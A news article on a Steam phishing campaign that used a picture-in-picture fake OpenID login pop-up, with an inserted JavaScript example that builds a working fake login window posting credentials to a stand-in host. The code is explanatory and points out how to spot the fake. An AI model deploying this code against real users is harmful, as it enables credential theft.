Scammers used a picture-in-picture phishing pop-up

Oct 1, 2018 20:29 GMT  ·  By

Phishing attacks are nothing new, especially spam e-mails sent in the hope of reaching a gullible victim who will click a maliciously crafted link or open a malware dropper script disguised as an attachment.

That being said, a security researcher from San Francisco, CA, who goes by the online handle Aurum, has found a phishing campaign targeting Steam users with an unorthodox technique for spoofing legitimate login pages.

He came across the phishing site, tradeit.cash, after a conversation with one of the scammers behind the campaign, and noticed that it was a near-identical copy of skins.cash, a legitimate Steam trading site.

From here on things got very interesting, seeing that the scammers went to the trouble of hosting their phishing site behind Cloudflare and serving it over a Cloudflare-issued TLS certificate, so the browser showed a padlock and the site looked as believable as possible. A valid certificate only proves that the connection to tradeit.cash is encrypted; it says nothing about who operates the site.

The scam started with a pop-up claiming that the site was under load and asking the visitor to log in with Steam instead.

The Steam phishing website used a picture-in-picture phishing technique to simulate an OpenID login screen flawlessly

Going along with it, Aurum realized that something was not quite right: a site he had taken for a scam from the start was opening what looked like a genuine Steam OpenID login pop-up.

And this is where things get really interesting. The pop-up, which looked exactly like the real thing, was not a browser window at all; it was drawn inside the phishing page itself. Aurum caught on when he tried to switch between the main window and the pop-up using the taskbar and found that the "pop-up" had no window of its own. The same check works anywhere: a genuine login window can be dragged outside the browser's viewport or reached with Alt+Tab, while a picture-in-picture fake is clipped at the edge of the page that draws it, no matter what URL and padlock its fake address bar shows.
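To make the technique concrete, here is an added example (not code from the article or from the tradeit.cash kit) of how a picture-in-picture login window is built. The window chrome, padlock and address bar are ordinary page markup, so the URL the victim reads is just text the attacker chose, while the form posts to the attacker's server. The displayed URL is the real Steam OpenID endpoint; the capture URL `https://phisher.example/collect` is a hypothetical placeholder. The `clampToViewport` helper is what keeps the fake window inside the page when dragged, which is exactly the tell described above.

```javascript
// Added example, not from the article: a minimal picture-in-picture
// login "pop-up". Nothing here is a real window; it is a <div> that the
// phishing page positions, drags and styles to look like browser chrome.
// CAPTURE_URL is a hypothetical placeholder, not an endpoint from the campaign.

// What the victim should believe they are looking at (real Steam OpenID URL).
const DISPLAYED_URL = "https://steamcommunity.com/openid/login";
// Where the credentials actually go (hypothetical attacker endpoint).
const CAPTURE_URL = "https://phisher.example/collect";

// Builds the markup for the fake browser window. The "address bar" is plain
// text and the padlock is a glyph, so neither reflects any TLS state.
function fakeWindowMarkup(displayedUrl, captureUrl) {
  return [
    '<div id="pip" style="position:fixed;left:120px;top:80px;width:480px;',
    'border:1px solid #888;background:#fff;box-shadow:0 4px 16px rgba(0,0,0,.5);">',
    '  <div class="titlebar" style="background:#ddd;padding:4px;cursor:move;">',
    '    <span style="color:green;">&#128274;</span>',
    '    <span class="url">' + displayedUrl + '</span>',
    '  </div>',
    '  <form method="post" action="' + captureUrl + '">',
    '    <input name="username" placeholder="Steam account name">',
    '    <input name="password" type="password" placeholder="Password">',
    '    <button type="submit">Sign in</button>',
    '  </form>',
    '</div>',
  ].join("\n");
}

// A real OS window can be dragged past the browser's edge; a fake one is an
// element inside the document and can never leave the viewport. This is the
// tell Aurum hit when the "pop-up" had no taskbar entry of its own.
function clampToViewport(rect, viewport) {
  const x = Math.min(Math.max(rect.x, 0), viewport.width - rect.width);
  const y = Math.min(Math.max(rect.y, 0), viewport.height - rect.height);
  return { x, y, width: rect.width, height: rect.height };
}

// Wires up dragging of the fake title bar (browser only).
function makeDraggable(el, titlebar) {
  let drag = null;
  titlebar.addEventListener("mousedown", (e) => {
    drag = { dx: e.clientX - el.offsetLeft, dy: e.clientY - el.offsetTop };
  });
  window.addEventListener("mouseup", () => { drag = null; });
  window.addEventListener("mousemove", (e) => {
    if (!drag) return;
    const r = clampToViewport(
      { x: e.clientX - drag.dx, y: e.clientY - drag.dy,
        width: el.offsetWidth, height: el.offsetHeight },
      { width: window.innerWidth, height: window.innerHeight });
    el.style.left = r.x + "px";
    el.style.top = r.y + "px";
  });
}

// Only run the DOM part inside a browser; the helpers above are pure.
if (typeof document !== "undefined") {
  document.body.insertAdjacentHTML("beforeend",
    fakeWindowMarkup(DISPLAYED_URL, CAPTURE_URL));
  const el = document.getElementById("pip");
  makeDraggable(el, el.querySelector(".titlebar"));
}
```

Paste the block into any page's console to see the effect: the "window" moves with the mouse but stops at the viewport edge, and it disappears if the tab is scrolled or closed, which a real `window.open` pop-up never does.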

Although seemingly ground-breaking and quite devious, this authentication form impersonation technique was documented more than a decade earlier by a team of security researchers from Stanford University and Microsoft Research in a paper titled "An Evaluation of Extended Validation and Picture-in-Picture Phishing Attacks", published in February 2007.

Aurum's discovery is still valuable, though, since it gives us insight into the way threat actors re-use techniques proven effective years ago in new campaigns aimed at other victims.